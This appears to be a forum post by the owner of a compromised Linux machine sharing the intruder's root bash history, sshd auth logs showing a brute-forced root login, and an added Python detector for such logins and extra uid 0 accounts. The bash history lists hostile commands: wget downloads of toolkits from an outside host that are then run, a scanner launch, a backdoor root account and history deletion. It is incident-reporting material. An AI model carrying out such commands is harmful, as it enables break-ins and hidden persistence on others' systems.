I'm posting some big logs below.

I don't know whether they're useful for learning anything, but they're the only ones left ...

The first one left is root's bash log:

w
dir -a
rm -rf .bash_history .bash_logout .fullcircle .ICEauthority .rfbdrake .vimrc
ls
dir -a
rm -rf .bash_profile .bashrc
/usr/sbin/adduser admin -g0 -o -u0
passwd admin
cat /etc/issue
/sbin/ifconfig
cd /var/tmp
wget bone.go.ro/mirkforce.tgz
tar -xzvf mirkforce.tgz
rm -rf mirkforce.tgz
cd ./ecmf/
./mirkforce
cd ..
ls
rm -rf ./ecmf/
cd /var/spool/samba/
ls
wget bone.go.ro/hait.tgz
tar -xzvf hait.tgz
rm -rf hait.tgz
cd ssh/
./go.sh 210.21
cd ..
ls
rm -rf ssh/
wget bone.go.ro/bone.tgz
tar -xzvf bone.tgz
rm -rf bone.tgz
cd " "
ls
mv lroot init
export PATH=.:$PATH
init
cd " "
ls
wget bone.go.ro/treeball.tgz
tar -xzvf treeball.tgz
dir -a
rm -rf treeball.tgz
ls

As you can see, they created the admin user, the one that made me suspicious when Mandrake booted, and the rest is history.

And these are the auth logs in /var/log:

Feb 15 21:20:00 francesco sshd[21706]: Did not receive identification string from 127.0.0.1
Feb 15 21:21:18 francesco sshd[21763]: Invalid user test from 217.29.80.92
Feb 15 21:21:18 francesco sshd[21763]: error: Could not get shadow information for NOUSER
Feb 15 21:21:18 francesco sshd[21763]: Failed password for invalid user test from 217.29.80.92 port 13155 ssh2
Feb 15 21:21:20 francesco sshd[21765]: Invalid user guest from 217.29.80.92
Feb 15 21:21:20 francesco sshd[21765]: error: Could not get shadow information for NOUSER
Feb 15 21:21:20 francesco sshd[21765]: Failed password for invalid user guest from 217.29.80.92 port 13239 ssh2
Feb 15 21:21:22 francesco sshd[21770]: Invalid user admin from 217.29.80.92
Feb 15 21:21:22 francesco sshd[21770]: error: Could not get shadow information for NOUSER
Feb 15 21:21:22 francesco sshd[21770]: Failed password for invalid user admin from 217.29.80.92 port 13315 ssh2
Feb 15 21:21:25 francesco sshd[21772]: Invalid user admin from 217.29.80.92
Feb 15 21:21:25 francesco sshd[21772]: error: Could not get shadow information for NOUSER
Feb 15 21:21:25 francesco sshd[21772]: Failed password for invalid user admin from 217.29.80.92 port 13439 ssh2
Feb 15 21:21:27 francesco sshd[21777]: Invalid user user from 217.29.80.92
Feb 15 21:21:27 francesco sshd[21777]: error: Could not get shadow information for NOUSER
Feb 15 21:21:27 francesco sshd[21777]: Failed password for invalid user user from 217.29.80.92 port 13538 ssh2
Feb 15 21:21:29 francesco sshd[21779]: Failed password for root from 217.29.80.92 port 13627 ssh2
Feb 15 21:21:31 francesco sshd[21784]: Accepted password for root from 217.29.80.92 port 13700 ssh2
Feb 15 21:22:06 francesco sshd[21845]: Accepted password for root from 81.181.153.217 port 1251 ssh2
Feb 15 21:22:57 francesco adduser[21925]: new user: name=admin, uid=0, gid=0, home=/home/admin, shell=/bin/bash
Feb 15 21:23:04 francesco passwd(pam_unix)[21929]: password changed for admin
Feb 15 21:25:00 francesco sshd[22060]: Did not receive identification string from 127.0.0.1
Feb 15 21:30:00 francesco sshd[22316]: Did not receive identification string from 127.0.0.1
Feb 15 21:33:53 francesco xinetd[5064]: START: sgi_fam pid=22502 from=<no address>
Feb 15 21:35:01 francesco sshd[22580]: Did not receive identification string from 127.0.0.1
Feb 15 21:40:00 francesco sshd[22840]: Did not receive identification string from 127.0.0.1
Feb 15 21:45:01 francesco sshd[23085]: Did not receive identification string from 127.0.0.1
Feb 15 21:50:00 francesco sshd[23313]: Did not receive identification string from 127.0.0.1
Feb 15 21:55:00 francesco sshd[23526]: Did not receive identification string from 127.0.0.1
Feb 15 22:00:00 francesco sshd[23740]: Did not receive identification string from 127.0.0.1

You can only see the start time and little else apart from their IP,

but obviously they went through a proxy or used something anyway to make it useless ...
Obviously, before the logs above, they must have done something to get root privileges or something similar; unfortunately I'm not an expert.
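The auth log above shows the two signals a defender can alert on without any special tooling: a burst of failed SSH logins from one address immediately followed by an accepted login, and an adduser entry creating a second uid=0 account. The following is an added detection example (not code from the poster) that parses lines in the same syslog format; the sample lines are constructed with documentation IPs, and the failure threshold is an assumed parameter.

```python
import re
from collections import defaultdict

# Constructed sample in the same sshd/adduser syslog format as the post
# (documentation IP addresses, not the ones from the original log).
SAMPLE_AUTH_LOG = """\
Feb 15 21:21:18 francesco sshd[21763]: Invalid user test from 203.0.113.7
Feb 15 21:21:18 francesco sshd[21763]: Failed password for invalid user test from 203.0.113.7 port 13155 ssh2
Feb 15 21:21:20 francesco sshd[21765]: Failed password for invalid user guest from 203.0.113.7 port 13239 ssh2
Feb 15 21:21:22 francesco sshd[21770]: Failed password for invalid user admin from 203.0.113.7 port 13315 ssh2
Feb 15 21:21:27 francesco sshd[21777]: Failed password for invalid user user from 203.0.113.7 port 13538 ssh2
Feb 15 21:21:29 francesco sshd[21779]: Failed password for root from 203.0.113.7 port 13627 ssh2
Feb 15 21:21:31 francesco sshd[21784]: Accepted password for root from 203.0.113.7 port 13700 ssh2
Feb 15 21:22:06 francesco sshd[21845]: Accepted password for root from 198.51.100.9 port 1251 ssh2
Feb 15 21:22:57 francesco adduser[21925]: new user: name=admin, uid=0, gid=0, home=/home/admin, shell=/bin/bash
Feb 15 21:25:00 francesco sshd[22060]: Did not receive identification string from 127.0.0.1
"""

# "invalid user" is optional: failures for existing accounts (e.g. root) lack it.
FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted \w+ for (\S+) from (\S+) port")
NEW_USER_RE = re.compile(r"adduser\[\d+\]: new user: name=(\S+), uid=(\d+), gid=(\d+)")


def analyse(log_text, threshold=3):
    """Return findings: (kind, ...) tuples in log order.

    threshold (assumed) = failed logins from one IP before a later success is flagged.
    """
    failures = defaultdict(list)  # source IP -> usernames that failed from it
    findings = []
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failures[m.group(2)].append(m.group(1))
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            user, ip = m.groups()
            if len(failures[ip]) >= threshold:
                findings.append(("brute_force_success", ip, user, len(failures[ip])))
            continue
        m = NEW_USER_RE.search(line)
        if m:
            name, uid, gid = m.groups()
            # Any uid 0 account other than root is a backdoor, whatever its name.
            if uid == "0" and name != "root":
                findings.append(("uid0_account", name, uid, gid))
    return findings
```

Run against the post's real log the same function reports the successful root login from the brute-forcing address and the admin uid=0 account; the second root login from a different address has no preceding failures and is only caught by correlating with the first finding.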